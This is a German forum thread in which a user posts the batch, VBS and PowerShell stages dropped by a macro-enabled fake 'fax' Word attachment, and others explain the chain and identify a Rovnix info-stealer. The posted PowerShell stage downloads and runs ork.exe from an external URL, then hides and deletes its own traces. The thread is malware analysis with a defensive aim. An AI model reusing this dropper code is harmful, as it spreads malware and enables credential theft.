Kann mir das jemand erläutern?
Moin,
heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.
-> VM an -> Office drauf -> Spaß
Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:
444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat
adobeacd-update.vbs
adobeacd-update.ps1
Was genau macht das?
heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.
-> VM an -> Office drauf -> Spaß
Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:
444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat
@echo off
ping 1.1.2.2 -n 2
cscript.exe "c:\windows\temp\adobeacd-update.vbs"
exit
adobeacd-update.vbs
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = "231"
Set objFSO=CreateObject("Scripting.FileSystemObject")
currentFile = "c:\windows\temp\adobeacd-update.ps1"
caisudkh38e = "231"
quid8hiqje = "231"
Set objShell = CreateObject("Wscript.shell")
caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd = "231"
objShell.run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true
caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = "231"
adobeacd-update.ps1
$hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3';
$hash = '0';
$down = New-Object System.Net.WebClient;
$url = 'http://idtvietnam.vn/images/ork.exe';
$hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd';
$file = 'c:\windows\temp\444.exe';
$hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd';
$down.DownloadFile($url,$file);
$ScriptDir = $MyInvocation.ScriptName;
$someFilePath = 'c:\windows\temp\' + '444.exe';
$vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.vbs';
$batFilePath = 'c:\windows\temp\' + 'adobeacd-update.bat';
$psFilePath = 'c:\windows\temp\' + 'adobeacd-update.ps1';
Start-Sleep -s 10;
cmd.exe /c 'c:\windows\temp\444.exe';
$file1 = gci $vbsFilePath -Force
$file2 = gci $batFilePath -Force
$file3 = gci $psFilePath -Force
$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }
If (Test-Path $batFilePath){ Remove-Item $batFilePath }
If (Test-Path $someFilePath){ Remove-Item $someFilePath }
Remove-Item $MyINvocation.InvocationName
Was genau macht das?
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 254187
Url: https://administrator.de/forum/kann-mir-das-jemand-erlaeutern-254187.html
Ausgedruckt am: 07.04.2025 um 10:04 Uhr
15 Kommentare
Neuester Kommentar
Hi Xaero,
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:
Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe' die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.
Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern"
. Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !
Grüße Uwe
p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:
Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe' die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.
Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern"
Grüße Uwe
p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus
- Olydbg anwerfen
- File durch den Disassembler jagen
- Gleichzeitig Procmon laufen lassen
Was für lange Winterabende
Schönes Wochenende
Grüße Uwe
Na zuerst mal auf den Prozess 444.exe, später dann auf andere je nachdem was das Teil so macht ...
Zitat von @Xaero1982:
Offenbar macht der ne Menge.
Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.
Insgesamt 6149 Zugriffe.
wenn du jetzt noch nach Category = "Write" filterst siehst du was er eventuell verändert. Könnte aber auch ein einfacher Datendieb sein der in Dateien und Registry-Einträgen nach Passwörtern scannt und diese an den CC-Server sendet.Offenbar macht der ne Menge.
Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.
Insgesamt 6149 Zugriffe.
Lad das Teil doch einfach mal auf VirusTotal.com hoch, ob es schon in den Definitionen der AntiVirus-Hersteller verzeichnet ist.
Aber wahrscheinlich willst du damit nur etwas üben, gelle
dann schau mal was das Teil in die Temp-Datei tmp74A4.tmp schreibt, ich vermute es dupliziert sich als Backup.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.
Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.
Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.
Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.
Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Das ist ein Trojaner der sensitive Informationen über sein Opfer stiehlt:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471
Die Übermittlung muss nicht immer direkt stattfinden, das lässt sich meistens erst sagen wenn man den über einen längeren Zeitraum beobachtet. Es kann auch sein das der Server schon vom
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471
Win32/Rovnix is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine. It uses techniques common among rootkits.
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
DNS-Request übersehen! optimalnewbie.co.uk ist aber schon länger trocken gelegt.